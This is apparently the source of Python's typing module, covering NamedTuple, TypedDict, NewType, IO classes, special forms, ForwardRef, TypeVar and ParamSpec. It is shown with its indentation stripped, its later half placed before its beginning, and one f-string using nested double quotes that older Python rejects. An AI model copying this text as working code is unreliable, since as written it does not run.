types = {n: _type_check(t, f"field {n} annotation must be a type")
for n, t in types}
nm_tpl = collections.namedtuple(name, fields,
defaults=defaults, module=module)
nm_tpl.__annotations__ = nm_tpl.__new__.__annotations__ = types
return nm_tpl
# attributes prohibited to set in NamedTuple class syntax
_prohibited = frozenset({'__new__', '__init__', '__slots__', '__getnewargs__',
'_fields', '_field_defaults',
'_make', '_replace', '_asdict', '_source'})
_special = frozenset({'__module__', '__name__', '__annotations__'})
class NamedTupleMeta(type):
def __new__(cls, typename, bases, ns):
assert bases[0] is _NamedTuple
types = ns.get('__annotations__', {})
default_names = []
for field_name in types:
if field_name in ns:
default_names.append(field_name)
elif default_names:
raise TypeError(f"Non-default namedtuple field {field_name} "
f"cannot follow default field"
f"{"s" if len(default_names) > 1 else ""} "
f"{", ".join(default_names)}")
nm_tpl = _make_nmtuple(typename, types.items(),
defaults=[ns[n] for n in default_names],
module=ns['__module__'])
# update from user namespace without overriding special namedtuple attributes
for key in ns:
if key in _prohibited:
raise AttributeError("Cannot overwrite NamedTuple attribute " + key)
elif key not in _special and key not in nm_tpl._fields:
setattr(nm_tpl, key, ns[key])
return nm_tpl
def NamedTuple(typename, fields=None, /, **kwargs):
"""Typed version of namedtuple.
Usage in Python versions >= 3.6::
class Employee(NamedTuple):
name: str
id: int
This is equivalent to::
Employee = collections.namedtuple('Employee', ['name', 'id'])
The resulting class has an extra __annotations__ attribute, giving a
dict that maps field names to types. (The field names are also in
the _fields attribute, which is part of the namedtuple API.)
Alternative equivalent keyword syntax is also accepted::
Employee = NamedTuple('Employee', name=str, id=int)
In Python versions <= 3.5 use::
Employee = NamedTuple('Employee', [('name', str), ('id', int)])
"""
if fields is None:
fields = kwargs.items()
elif kwargs:
raise TypeError("Either list of fields or keywords"
" can be provided to NamedTuple, not both")
return _make_nmtuple(typename, fields, module=_caller())
_NamedTuple = type.__new__(NamedTupleMeta, 'NamedTuple', (), {})
def _namedtuple_mro_entries(bases):
if len(bases) > 1:
raise TypeError("Multiple inheritance with NamedTuple is not supported")
assert bases[0] is NamedTuple
return (_NamedTuple,)
NamedTuple.__mro_entries__ = _namedtuple_mro_entries
class _TypedDictMeta(type):
def __new__(cls, name, bases, ns, total=True):
"""Create new typed dict class object.
This method is called when TypedDict is subclassed,
or when TypedDict is instantiated. This way
TypedDict supports all three syntax forms described in its docstring.
Subclasses and instances of TypedDict return actual dictionaries.
"""
for base in bases:
if type(base) is not _TypedDictMeta:
raise TypeError('cannot inherit from both a TypedDict type '
'and a non-TypedDict base class')
tp_dict = type.__new__(_TypedDictMeta, name, (dict,), ns)
annotations = {}
own_annotations = ns.get('__annotations__', {})
own_annotation_keys = set(own_annotations.keys())
msg = "TypedDict('Name', {f0: t0, f1: t1, ...}); each t must be a type"
own_annotations = {
n: _type_check(tp, msg, module=tp_dict.__module__)
for n, tp in own_annotations.items()
}
required_keys = set()
optional_keys = set()
for base in bases:
annotations.update(base.__dict__.get('__annotations__', {}))
required_keys.update(base.__dict__.get('__required_keys__', ()))
optional_keys.update(base.__dict__.get('__optional_keys__', ()))
annotations.update(own_annotations)
if total:
required_keys.update(own_annotation_keys)
else:
optional_keys.update(own_annotation_keys)
tp_dict.__annotations__ = annotations
tp_dict.__required_keys__ = frozenset(required_keys)
tp_dict.__optional_keys__ = frozenset(optional_keys)
if not hasattr(tp_dict, '__total__'):
tp_dict.__total__ = total
return tp_dict
__call__ = dict # static method
def __subclasscheck__(cls, other):
# Typed dicts are only for static structural subtyping.
raise TypeError('TypedDict does not support instance and class checks')
__instancecheck__ = __subclasscheck__
def TypedDict(typename, fields=None, /, *, total=True, **kwargs):
"""A simple typed namespace. At runtime it is equivalent to a plain dict.
TypedDict creates a dictionary type that expects all of its
instances to have a certain set of keys, where each key is
associated with a value of a consistent type. This expectation
is not checked at runtime but is only enforced by type checkers.
Usage::
class Point2D(TypedDict):
x: int
y: int
label: str
a: Point2D = {'x': 1, 'y': 2, 'label': 'good'} # OK
b: Point2D = {'z': 3, 'label': 'bad'} # Fails type check
assert Point2D(x=1, y=2, label='first') == dict(x=1, y=2, label='first')
The type info can be accessed via the Point2D.__annotations__ dict, and
the Point2D.__required_keys__ and Point2D.__optional_keys__ frozensets.
TypedDict supports two additional equivalent forms::
Point2D = TypedDict('Point2D', x=int, y=int, label=str)
Point2D = TypedDict('Point2D', {'x': int, 'y': int, 'label': str})
By default, all keys must be present in a TypedDict. It is possible
to override this by specifying totality.
Usage::
class point2D(TypedDict, total=False):
x: int
y: int
This means that a point2D TypedDict can have any of the keys omitted.A type
checker is only expected to support a literal False or True as the value of
the total argument. True is the default, and makes all items defined in the
class body be required.
The class syntax is only supported in Python 3.6+, while two other
syntax forms work for Python 2.7 and 3.2+
"""
if fields is None:
fields = kwargs
elif kwargs:
raise TypeError("TypedDict takes either a dict or keyword arguments,"
" but not both")
ns = {'__annotations__': dict(fields)}
module = _caller()
if module is not None:
# Setting correct module is necessary to make typed dict classes pickleable.
ns['__module__'] = module
return _TypedDictMeta(typename, (), ns, total=total)
_TypedDict = type.__new__(_TypedDictMeta, 'TypedDict', (), {})
TypedDict.__mro_entries__ = lambda bases: (_TypedDict,)
class NewType:
"""NewType creates simple unique types with almost zero
runtime overhead. NewType(name, tp) is considered a subtype of tp
by static type checkers. At runtime, NewType(name, tp) returns
a dummy function that simply returns its argument. Usage::
UserId = NewType('UserId', int)
def name_by_id(user_id: UserId) -> str:
...
UserId('user') # Fails type check
name_by_id(42) # Fails type check
name_by_id(UserId(42)) # OK
num = UserId(5) + 1 # type: int
"""
__call__ = _idfunc
def __init__(self, name, tp):
self.__qualname__ = name
if '.' in name:
name = name.rpartition('.')[-1]
self.__name__ = name
self.__supertype__ = tp
def_mod = _caller()
if def_mod != 'typing':
self.__module__ = def_mod
def __repr__(self):
return f'{self.__module__}.{self.__qualname__}'
def __reduce__(self):
return self.__qualname__
def __or__(self, other):
return Union[self, other]
def __ror__(self, other):
return Union[other, self]
# Python-version-specific alias (Python 2: unicode; Python 3: str)
Text = str
# Constant that's True when type checking, but False here.
TYPE_CHECKING = False
class IO(Generic[AnyStr]):
"""Generic base class for TextIO and BinaryIO.
This is an abstract, generic version of the return of open().
NOTE: This does not distinguish between the different possible
classes (text vs. binary, read vs. write vs. read/write,
append-only, unbuffered). The TextIO and BinaryIO subclasses
below capture the distinctions between text vs. binary, which is
pervasive in the interface; however we currently do not offer a
way to track the other distinctions in the type system.
"""
__slots__ = ()
@property
@abstractmethod
def mode(self) -> str:
pass
@property
@abstractmethod
def name(self) -> str:
pass
@abstractmethod
def close(self) -> None:
pass
@property
@abstractmethod
def closed(self) -> bool:
pass
@abstractmethod
def fileno(self) -> int:
pass
@abstractmethod
def flush(self) -> None:
pass
@abstractmethod
def isatty(self) -> bool:
pass
@abstractmethod
def read(self, n: int = -1) -> AnyStr:
pass
@abstractmethod
def readable(self) -> bool:
pass
@abstractmethod
def readline(self, limit: int = -1) -> AnyStr:
pass
@abstractmethod
def readlines(self, hint: int = -1) -> List[AnyStr]:
pass
@abstractmethod
def seek(self, offset: int, whence: int = 0) -> int:
pass
@abstractmethod
def seekable(self) -> bool:
pass
@abstractmethod
def tell(self) -> int:
pass
@abstractmethod
def truncate(self, size: int = None) -> int:
pass
@abstractmethod
def writable(self) -> bool:
pass
@abstractmethod
def write(self, s: AnyStr) -> int:
pass
@abstractmethod
def writelines(self, lines: List[AnyStr]) -> None:
pass
@abstractmethod
def __enter__(self) -> 'IO[AnyStr]':
pass
@abstractmethod
def __exit__(self, type, value, traceback) -> None:
pass
class BinaryIO(IO[bytes]):
"""Typed version of the return of open() in binary mode."""
__slots__ = ()
@abstractmethod
def write(self, s: Union[bytes, bytearray]) -> int:
pass
@abstractmethod
def __enter__(self) -> 'BinaryIO':
pass
class TextIO(IO[str]):
"""Typed version of the return of open() in text mode."""
__slots__ = ()
@property
@abstractmethod
def buffer(self) -> BinaryIO:
pass
@property
@abstractmethod
def encoding(self) -> str:
pass
@property
@abstractmethod
def errors(self) -> Optional[str]:
pass
@property
@abstractmethod
def line_buffering(self) -> bool:
pass
@property
@abstractmethod
def newlines(self) -> Any:
pass
@abstractmethod
def __enter__(self) -> 'TextIO':
pass
class _DeprecatedType(type):
def __getattribute__(cls, name):
if name not in ("__dict__", "__module__") and name in cls.__dict__:
warnings.warn(
f"{cls.__name__} is deprecated, import directly "
f"from typing instead. {cls.__name__} will be removed "
"in Python 3.12.",
DeprecationWarning,
stacklevel=2,
)
return super().__getattribute__(name)
class io(metaclass=_DeprecatedType):
"""Wrapper namespace for IO generic classes."""
__all__ = ['IO', 'TextIO', 'BinaryIO']
IO = IO
TextIO = TextIO
BinaryIO = BinaryIO
io.__name__ = __name__ + '.io'
sys.modules[io.__name__] = io
Pattern = _alias(stdlib_re.Pattern, 1)
Match = _alias(stdlib_re.Match, 1)
class re(metaclass=_DeprecatedType):
"""Wrapper namespace for re type aliases."""
__all__ = ['Pattern', 'Match']
Pattern = Pattern
Match = Match
re.__name__ = __name__ + '.re'
sys.modules[re.__name__] = re
| """
The typing module: Support for gradual typing as defined by PEP 484.
At large scale, the structure of the module is following:
* Imports and exports, all public names should be explicitly added to __all__.
* Internal helper functions: these should never be used in code outside this module.
* _SpecialForm and its instances (special forms):
Any, NoReturn, ClassVar, Union, Optional, Concatenate
* Classes whose instances can be type arguments in addition to types:
ForwardRef, TypeVar and ParamSpec
* The core of internal generics API: _GenericAlias and _VariadicGenericAlias, the latter is
currently only used by Tuple and Callable. All subscripted types like X[int], Union[int, str],
etc., are instances of either of these classes.
* The public counterpart of the generics API consists of two classes: Generic and Protocol.
* Public helper functions: get_type_hints, overload, cast, no_type_check,
no_type_check_decorator.
* Generic aliases for collections.abc ABCs and few additional protocols.
* Special types: NewType, NamedTuple, TypedDict.
* Wrapper submodules for re and io related types.
"""
from abc import abstractmethod, ABCMeta
import collections
import collections.abc
import contextlib
import functools
import operator
import re as stdlib_re # Avoid confusion with the re we export.
import sys
import types
import warnings
from types import WrapperDescriptorType, MethodWrapperType, MethodDescriptorType, GenericAlias
try:
from _typing import _idfunc
except ImportError:
def _idfunc(_, x):
return x
# Please keep __all__ alphabetized within each category.
__all__ = [
# Super-special typing primitives.
'Annotated',
'Any',
'Callable',
'ClassVar',
'Concatenate',
'Final',
'ForwardRef',
'Generic',
'Literal',
'Optional',
'ParamSpec',
'Protocol',
'Tuple',
'Type',
'TypeVar',
'Union',
# ABCs (from collections.abc).
'AbstractSet', # collections.abc.Set.
'ByteString',
'Container',
'ContextManager',
'Hashable',
'ItemsView',
'Iterable',
'Iterator',
'KeysView',
'Mapping',
'MappingView',
'MutableMapping',
'MutableSequence',
'MutableSet',
'Sequence',
'Sized',
'ValuesView',
'Awaitable',
'AsyncIterator',
'AsyncIterable',
'Coroutine',
'Collection',
'AsyncGenerator',
'AsyncContextManager',
# Structural checks, a.k.a. protocols.
'Reversible',
'SupportsAbs',
'SupportsBytes',
'SupportsComplex',
'SupportsFloat',
'SupportsIndex',
'SupportsInt',
'SupportsRound',
# Concrete collection types.
'ChainMap',
'Counter',
'Deque',
'Dict',
'DefaultDict',
'List',
'OrderedDict',
'Set',
'FrozenSet',
'NamedTuple', # Not really a type.
'TypedDict', # Not really a type.
'Generator',
# Other concrete types.
'BinaryIO',
'IO',
'Match',
'Pattern',
'TextIO',
# One-off things.
'AnyStr',
'cast',
'final',
'get_args',
'get_origin',
'get_type_hints',
'is_typeddict',
'NewType',
'no_type_check',
'no_type_check_decorator',
'NoReturn',
'overload',
'ParamSpecArgs',
'ParamSpecKwargs',
'runtime_checkable',
'Text',
'TYPE_CHECKING',
'TypeAlias',
'TypeGuard',
]
# The pseudo-submodules 're' and 'io' are part of the public
# namespace, but excluded from __all__ because they might stomp on
# legitimate imports of those modules.
def _type_convert(arg, module=None):
"""For converting None to type(None), and strings to ForwardRef."""
if arg is None:
return type(None)
if isinstance(arg, str):
return ForwardRef(arg, module=module)
return arg
def _type_check(arg, msg, is_argument=True, module=None, *, is_class=False):
"""Check that the argument is a type, and return it (internal helper).
As a special case, accept None and return type(None) instead. Also wrap strings
into ForwardRef instances. Consider several corner cases, for example plain
special forms like Union are not valid, while Union[int, str] is OK, etc.
The msg argument is a human-readable error message, e.g::
"Union[arg, ...]: arg should be a type."
We append the repr() of the actual value (truncated to 100 chars).
"""
invalid_generic_forms = (Generic, Protocol)
if not is_class:
invalid_generic_forms += (ClassVar,)
if is_argument:
invalid_generic_forms += (Final,)
arg = _type_convert(arg, module=module)
if (isinstance(arg, _GenericAlias) and
arg.__origin__ in invalid_generic_forms):
raise TypeError(f"{arg} is not valid as type argument")
if arg in (Any, NoReturn, Final):
return arg
if isinstance(arg, _SpecialForm) or arg in (Generic, Protocol):
raise TypeError(f"Plain {arg} is not valid as type argument")
if isinstance(arg, (type, TypeVar, ForwardRef, types.UnionType, ParamSpec)):
return arg
if not callable(arg):
raise TypeError(f"{msg} Got {arg!r:.100}.")
return arg
def _is_param_expr(arg):
return arg is ... or isinstance(arg,
(tuple, list, ParamSpec, _ConcatenateGenericAlias))
def _type_repr(obj):
"""Return the repr() of an object, special-casing types (internal helper).
If obj is a type, we return a shorter version than the default
type.__repr__, based on the module and qualified name, which is
typically enough to uniquely identify a type. For everything
else, we fall back on repr(obj).
"""
if isinstance(obj, types.GenericAlias):
return repr(obj)
if isinstance(obj, type):
if obj.__module__ == 'builtins':
return obj.__qualname__
return f'{obj.__module__}.{obj.__qualname__}'
if obj is ...:
return('...')
if isinstance(obj, types.FunctionType):
return obj.__name__
return repr(obj)
def _collect_type_vars(types_, typevar_types=None):
"""Collect all type variable contained
in types in order of first appearance (lexicographic order). For example::
_collect_type_vars((T, List[S, T])) == (T, S)
"""
if typevar_types is None:
typevar_types = TypeVar
tvars = []
for t in types_:
if isinstance(t, typevar_types) and t not in tvars:
tvars.append(t)
if isinstance(t, (_GenericAlias, GenericAlias, types.UnionType)):
tvars.extend([t for t in t.__parameters__ if t not in tvars])
return tuple(tvars)
def _check_generic(cls, parameters, elen):
"""Check correct count for parameters of a generic cls (internal helper).
This gives a nice error message in case of count mismatch.
"""
if not elen:
raise TypeError(f"{cls} is not a generic class")
alen = len(parameters)
if alen != elen:
raise TypeError(f"Too {'many' if alen > elen else 'few'} arguments for {cls};"
f" actual {alen}, expected {elen}")
def _prepare_paramspec_params(cls, params):
"""Prepares the parameters for a Generic containing ParamSpec
variables (internal helper).
"""
# Special case where Z[[int, str, bool]] == Z[int, str, bool] in PEP 612.
if (len(cls.__parameters__) == 1
and params and not _is_param_expr(params[0])):
assert isinstance(cls.__parameters__[0], ParamSpec)
return (params,)
else:
_check_generic(cls, params, len(cls.__parameters__))
_params = []
# Convert lists to tuples to help other libraries cache the results.
for p, tvar in zip(params, cls.__parameters__):
if isinstance(tvar, ParamSpec) and isinstance(p, list):
p = tuple(p)
_params.append(p)
return tuple(_params)
def _deduplicate(params):
# Weed out strict duplicates, preserving the first of each occurrence.
all_params = set(params)
if len(all_params) < len(params):
new_params = []
for t in params:
if t in all_params:
new_params.append(t)
all_params.remove(t)
params = new_params
assert not all_params, all_params
return params
def _remove_dups_flatten(parameters):
"""An internal helper for Union creation and substitution: flatten Unions
among parameters, then remove duplicates.
"""
# Flatten out Union[Union[...], ...].
params = []
for p in parameters:
if isinstance(p, (_UnionGenericAlias, types.UnionType)):
params.extend(p.__args__)
elif isinstance(p, tuple) and len(p) > 0 and p[0] is Union:
params.extend(p[1:])
else:
params.append(p)
return tuple(_deduplicate(params))
def _flatten_literal_params(parameters):
"""An internal helper for Literal creation: flatten Literals among parameters"""
params = []
for p in parameters:
if isinstance(p, _LiteralGenericAlias):
params.extend(p.__args__)
else:
params.append(p)
return tuple(params)
_cleanups = []
def _tp_cache(func=None, /, *, typed=False):
"""Internal wrapper caching __getitem__ of generic types with a fallback to
original function for non-hashable arguments.
"""
def decorator(func):
cached = functools.lru_cache(typed=typed)(func)
_cleanups.append(cached.cache_clear)
@functools.wraps(func)
def inner(*args, **kwds):
try:
return cached(*args, **kwds)
except TypeError:
pass # All real errors (not unhashable args) are raised below.
return func(*args, **kwds)
return inner
if func is not None:
return decorator(func)
return decorator
def _eval_type(t, globalns, localns, recursive_guard=frozenset()):
"""Evaluate all forward references in the given type t.
For use of globalns and localns see the docstring for get_type_hints().
recursive_guard is used to prevent prevent infinite recursion
with recursive ForwardRef.
"""
if isinstance(t, ForwardRef):
return t._evaluate(globalns, localns, recursive_guard)
if isinstance(t, (_GenericAlias, GenericAlias, types.UnionType)):
ev_args = tuple(_eval_type(a, globalns, localns, recursive_guard) for a in t.__args__)
if ev_args == t.__args__:
return t
if isinstance(t, GenericAlias):
return GenericAlias(t.__origin__, ev_args)
if isinstance(t, types.UnionType):
return functools.reduce(operator.or_, ev_args)
else:
return t.copy_with(ev_args)
return t
class _Final:
"""Mixin to prohibit subclassing"""
__slots__ = ('__weakref__',)
def __init_subclass__(self, /, *args, **kwds):
if '_root' not in kwds:
raise TypeError("Cannot subclass special typing classes")
class _Immutable:
"""Mixin to indicate that object should not be copied."""
__slots__ = ()
def __copy__(self):
return self
def __deepcopy__(self, memo):
return self
# Internal indicator of special typing constructs.
# See __doc__ instance attribute for specific docs.
class _SpecialForm(_Final, _root=True):
__slots__ = ('_name', '__doc__', '_getitem')
def __init__(self, getitem):
self._getitem = getitem
self._name = getitem.__name__
self.__doc__ = getitem.__doc__
def __getattr__(self, item):
if item in {'__name__', '__qualname__'}:
return self._name
raise AttributeError(item)
def __mro_entries__(self, bases):
raise TypeError(f"Cannot subclass {self!r}")
def __repr__(self):
return 'typing.' + self._name
def __reduce__(self):
return self._name
def __call__(self, *args, **kwds):
raise TypeError(f"Cannot instantiate {self!r}")
def __or__(self, other):
return Union[self, other]
def __ror__(self, other):
return Union[other, self]
def __instancecheck__(self, obj):
raise TypeError(f"{self} cannot be used with isinstance()")
def __subclasscheck__(self, cls):
raise TypeError(f"{self} cannot be used with issubclass()")
@_tp_cache
def __getitem__(self, parameters):
return self._getitem(self, parameters)
class _LiteralSpecialForm(_SpecialForm, _root=True):
def __getitem__(self, parameters):
if not isinstance(parameters, tuple):
parameters = (parameters,)
return self._getitem(self, *parameters)
@_SpecialForm
def Any(self, parameters):
"""Special type indicating an unconstrained type.
- Any is compatible with every type.
- Any assumed to have all methods.
- All values assumed to be instances of Any.
Note that all the above statements are true from the point of view of
static type checkers. At runtime, Any should not be used with instance
or class checks.
"""
raise TypeError(f"{self} is not subscriptable")
@_SpecialForm
def NoReturn(self, parameters):
"""Special type indicating functions that never return.
Example::
from typing import NoReturn
def stop() -> NoReturn:
raise Exception('no way')
This type is invalid in other positions, e.g., ``List[NoReturn]``
will fail in static type checkers.
"""
raise TypeError(f"{self} is not subscriptable")
@_SpecialForm
def ClassVar(self, parameters):
"""Special type construct to mark class variables.
An annotation wrapped in ClassVar indicates that a given
attribute is intended to be used as a class variable and
should not be set on instances of that class. Usage::
class Starship:
stats: ClassVar[Dict[str, int]] = {} # class variable
damage: int = 10 # instance variable
ClassVar accepts only types and cannot be further subscribed.
Note that ClassVar is not a class itself, and should not
be used with isinstance() or issubclass().
"""
item = _type_check(parameters, f'{self} accepts only single type.')
return _GenericAlias(self, (item,))
@_SpecialForm
def Final(self, parameters):
"""Special typing construct to indicate final names to type checkers.
A final name cannot be re-assigned or overridden in a subclass.
For example:
MAX_SIZE: Final = 9000
MAX_SIZE += 1 # Error reported by type checker
class Connection:
TIMEOUT: Final[int] = 10
class FastConnector(Connection):
TIMEOUT = 1 # Error reported by type checker
There is no runtime checking of these properties.
"""
item = _type_check(parameters, f'{self} accepts only single type.')
return _GenericAlias(self, (item,))
@_SpecialForm
def Union(self, parameters):
"""Union type; Union[X, Y] means either X or Y.
To define a union, use e.g. Union[int, str]. Details:
- The arguments must be types and there must be at least one.
- None as an argument is a special case and is replaced by
type(None).
- Unions of unions are flattened, e.g.::
Union[Union[int, str], float] == Union[int, str, float]
- Unions of a single argument vanish, e.g.::
Union[int] == int # The constructor actually returns int
- Redundant arguments are skipped, e.g.::
Union[int, str, int] == Union[int, str]
- When comparing unions, the argument order is ignored, e.g.::
Union[int, str] == Union[str, int]
- You cannot subclass or instantiate a union.
- You can use Optional[X] as a shorthand for Union[X, None].
"""
if parameters == ():
raise TypeError("Cannot take a Union of no types.")
if not isinstance(parameters, tuple):
parameters = (parameters,)
msg = "Union[arg, ...]: each arg must be a type."
parameters = tuple(_type_check(p, msg) for p in parameters)
parameters = _remove_dups_flatten(parameters)
if len(parameters) == 1:
return parameters[0]
if len(parameters) == 2 and type(None) in parameters:
return _UnionGenericAlias(self, parameters, name="Optional")
return _UnionGenericAlias(self, parameters)
@_SpecialForm
def Optional(self, parameters):
"""Optional type.
Optional[X] is equivalent to Union[X, None].
"""
arg = _type_check(parameters, f"{self} requires a single type.")
return Union[arg, type(None)]
@_LiteralSpecialForm
@_tp_cache(typed=True)
def Literal(self, *parameters):
"""Special typing form to define literal types (a.k.a. value types).
This form can be used to indicate to type checkers that the corresponding
variable or function parameter has a value equivalent to the provided
literal (or one of several literals):
def validate_simple(data: Any) -> Literal[True]: # always returns True
...
MODE = Literal['r', 'rb', 'w', 'wb']
def open_helper(file: str, mode: MODE) -> str:
...
open_helper('/some/path', 'r') # Passes type check
open_helper('/other/path', 'typo') # Error in type checker
Literal[...] cannot be subclassed. At runtime, an arbitrary value
is allowed as type argument to Literal[...], but type checkers may
impose restrictions.
"""
# There is no '_type_check' call because arguments to Literal[...] are
# values, not types.
parameters = _flatten_literal_params(parameters)
try:
parameters = tuple(p for p, _ in _deduplicate(list(_value_and_type_iter(parameters))))
except TypeError: # unhashable parameters
pass
return _LiteralGenericAlias(self, parameters)
@_SpecialForm
def TypeAlias(self, parameters):
"""Special marker indicating that an assignment should
be recognized as a proper type alias definition by type
checkers.
For example::
Predicate: TypeAlias = Callable[..., bool]
It's invalid when used anywhere except as in the example above.
"""
raise TypeError(f"{self} is not subscriptable")
@_SpecialForm
def Concatenate(self, parameters):
"""Used in conjunction with ``ParamSpec`` and ``Callable`` to represent a
higher order function which adds, removes or transforms parameters of a
callable.
For example::
Callable[Concatenate[int, P], int]
See PEP 612 for detailed information.
"""
if parameters == ():
raise TypeError("Cannot take a Concatenate of no types.")
if not isinstance(parameters, tuple):
parameters = (parameters,)
if not isinstance(parameters[-1], ParamSpec):
raise TypeError("The last parameter to Concatenate should be a "
"ParamSpec variable.")
msg = "Concatenate[arg, ...]: each arg must be a type."
parameters = tuple(_type_check(p, msg) for p in parameters)
return _ConcatenateGenericAlias(self, parameters)
@_SpecialForm
def TypeGuard(self, parameters):
"""Special typing form used to annotate the return type of a user-defined
type guard function. ``TypeGuard`` only accepts a single type argument.
At runtime, functions marked this way should return a boolean.
``TypeGuard`` aims to benefit *type narrowing* -- a technique used by static
type checkers to determine a more precise type of an expression within a
program's code flow. Usually type narrowing is done by analyzing
conditional code flow and applying the narrowing to a block of code. The
conditional expression here is sometimes referred to as a "type guard".
Sometimes it would be convenient to use a user-defined boolean function
as a type guard. Such a function should use ``TypeGuard[...]`` as its
return type to alert static type checkers to this intention.
Using ``-> TypeGuard`` tells the static type checker that for a given
function:
1. The return value is a boolean.
2. If the return value is ``True``, the type of its argument
is the type inside ``TypeGuard``.
For example::
def is_str(val: Union[str, float]):
# "isinstance" type guard
if isinstance(val, str):
# Type of ``val`` is narrowed to ``str``
...
else:
# Else, type of ``val`` is narrowed to ``float``.
...
Strict type narrowing is not enforced -- ``TypeB`` need not be a narrower
form of ``TypeA`` (it can even be a wider form) and this may lead to
type-unsafe results. The main reason is to allow for things like
narrowing ``List[object]`` to ``List[str]`` even though the latter is not
a subtype of the former, since ``List`` is invariant. The responsibility of
writing type-safe type guards is left to the user.
``TypeGuard`` also works with type variables. For more information, see
PEP 647 (User-Defined Type Guards).
"""
item = _type_check(parameters, f'{self} accepts only single type.')
return _GenericAlias(self, (item,))
class ForwardRef(_Final, _root=True):
"""Internal wrapper to hold a forward reference."""
__slots__ = ('__forward_arg__', '__forward_code__',
'__forward_evaluated__', '__forward_value__',
'__forward_is_argument__', '__forward_is_class__',
'__forward_module__')
def __init__(self, arg, is_argument=True, module=None, *, is_class=False):
if not isinstance(arg, str):
raise TypeError(f"Forward reference must be a string -- got {arg!r}")
try:
code = compile(arg, '<string>', 'eval')
except SyntaxError:
raise SyntaxError(f"Forward reference must be an expression -- got {arg!r}")
self.__forward_arg__ = arg
self.__forward_code__ = code
self.__forward_evaluated__ = False
self.__forward_value__ = None
self.__forward_is_argument__ = is_argument
self.__forward_is_class__ = is_class
self.__forward_module__ = module
def _evaluate(self, globalns, localns, recursive_guard):
if self.__forward_arg__ in recursive_guard:
return self
if not self.__forward_evaluated__ or localns is not globalns:
if globalns is None and localns is None:
globalns = localns = {}
elif globalns is None:
globalns = localns
elif localns is None:
localns = globalns
if self.__forward_module__ is not None:
globalns = getattr(
sys.modules.get(self.__forward_module__, None), '__dict__', globalns
)
type_ = _type_check(
eval(self.__forward_code__, globalns, localns),
"Forward references must evaluate to types.",
is_argument=self.__forward_is_argument__,
is_class=self.__forward_is_class__,
)
self.__forward_value__ = _eval_type(
type_, globalns, localns, recursive_guard | {self.__forward_arg__}
)
self.__forward_evaluated__ = True
return self.__forward_value__
def __eq__(self, other):
if not isinstance(other, ForwardRef):
return NotImplemented
if self.__forward_evaluated__ and other.__forward_evaluated__:
return (self.__forward_arg__ == other.__forward_arg__ and
self.__forward_value__ == other.__forward_value__)
return self.__forward_arg__ == other.__forward_arg__
def __hash__(self):
return hash(self.__forward_arg__)
def __or__(self, other):
return Union[self, other]
def __ror__(self, other):
return Union[other, self]
def __repr__(self):
return f'ForwardRef({self.__forward_arg__!r})'
class _TypeVarLike:
"""Mixin for TypeVar-like types (TypeVar and ParamSpec)."""
def __init__(self, bound, covariant, contravariant):
"""Used to setup TypeVars and ParamSpec's bound, covariant and
contravariant attributes.
"""
if covariant and contravariant:
raise ValueError("Bivariant types are not supported.")
self.__covariant__ = bool(covariant)
self.__contravariant__ = bool(contravariant)
if bound:
self.__bound__ = _type_check(bound, "Bound must be a type.")
else:
self.__bound__ = None
def __or__(self, right):
return Union[self, right]
def __ror__(self, left):
return Union[left, self]
def __repr__(self):
if self.__covariant__:
prefix = '+'
elif self.__contravariant__:
prefix = '-'
else:
prefix = '~'
return prefix + self.__name__
def __reduce__(self):
return self.__name__
class TypeVar( _Final, _Immutable, _TypeVarLike, _root=True):
"""Type variable.
Usage::
T = TypeVar('T') # Can be anything
A = TypeVar('A', str, bytes) # Must be str or bytes
Type variables exist primarily for the benefit of static type
checkers. They serve as the parameters for generic types as well
as for generic function definitions. See class Generic for more
information on generic types. Generic functions work as follows:
def repeat(x: T, n: int) -> List[T]:
'''Return a list containing n references to x.'''
return [x]*n
def longest(x: A, y: A) -> A:
'''Return the longest of two strings.'''
return x if len(x) >= len(y) else y
The latter example's signature is essentially the overloading
of (str, str) -> str and (bytes, bytes) -> bytes. Also note
that if the arguments are instances of some subclass of str,
the return type is still plain str.
At runtime, isinstance(x, T) and issubclass(C, T) will raise TypeError.
Type variables defined with covariant=True or contravariant=True
can be used to declare covariant or contravariant generic types.
See PEP 484 for more details. By default generic types are invariant
in all type variables.
Type variables can be introspected. e.g.:
T.__name__ == 'T'
T.__constraints__ == ()
T.__covariant__ == False
T.__contravariant__ = False
A.__constraints__ == (str, bytes)
Note that only type variables defined in global scope can be pickled.
"""
__slots__ = ('__name__', '__bound__', '__constraints__',
'__covariant__', '__contravariant__', '__dict__')
def __init__(self, name, *constraints, bound=None,
covariant=False, contravariant=False):
self.__name__ = name
super().__init__(bound, covariant, contravariant)
if constraints and bound is not None:
raise TypeError("Constraints cannot be combined with bound=...")
if constraints and len(constraints) == 1:
raise TypeError("A single constraint is not allowed")
msg = "TypeVar(name, constraint, ...): constraints must be types."
self.__constraints__ = tuple(_type_check(t, msg) for t in constraints)
def_mod = _caller()
if def_mod != 'typing':
self.__module__ = def_mod
class ParamSpecArgs(_Final, _Immutable, _root=True):
"""The args for a ParamSpec object.
Given a ParamSpec object P, P.args is an instance of ParamSpecArgs.
ParamSpecArgs objects have a reference back to their ParamSpec:
P.args.__origin__ is P
This type is meant for runtime introspection and has no special meaning to
static type checkers.
"""
def __init__(self, origin):
self.__origin__ = origin
def __repr__(self):
return f"{self.__origin__.__name__}.args"
class ParamSpecKwargs(_Final, _Immutable, _root=True):
"""The kwargs for a ParamSpec object.
Given a ParamSpec object P, P.kwargs is an instance of ParamSpecKwargs.
ParamSpecKwargs objects have a reference back to their ParamSpec:
P.kwargs.__origin__ is P
This type is meant for runtime introspection and has no special meaning to
static type checkers.
"""
def __init__(self, origin):
self.__origin__ = origin
def __repr__(self):
return f"{self.__origin__.__name__}.kwargs"
class ParamSpec(_Final, _Immutable, _TypeVarLike, _root=True):
"""Parameter specification variable.
Usage::
P = ParamSpec('P')
Parameter specification variables exist primarily for the benefit of static
type checkers. They are used to forward the parameter types of one
callable to another callable, a pattern commonly found in higher order
functions and decorators. They are only valid when used in ``Concatenate``,
or s the first argument to ``Callable``, or as parameters for user-defined
Generics. See class Generic for more information on generic types. An
example for annotating a decorator::
T = TypeVar('T')
P = ParamSpec('P')
def add_logging(f: Callable[P, T]) -> Callable[P, T]:
'''A type-safe decorator to add logging to a function.'''
def inner(*args: P.args, **kwargs: P.kwargs) -> T:
logging.info(f'{f.__name__} was called')
return f(*args, **kwargs)
return inner
@add_logging
def add_two(x: float, y: float) -> float:
'''Add two numbers together.'''
return x + y
Parameter specification variables defined with covariant=True or
contravariant=True can be used to declare covariant or contravariant
generic types. These keyword arguments are valid, but their actual semantics
are yet to be decided. See PEP 612 for details.
Parameter specification variables can be introspected. e.g.:
P.__name__ == 'T'
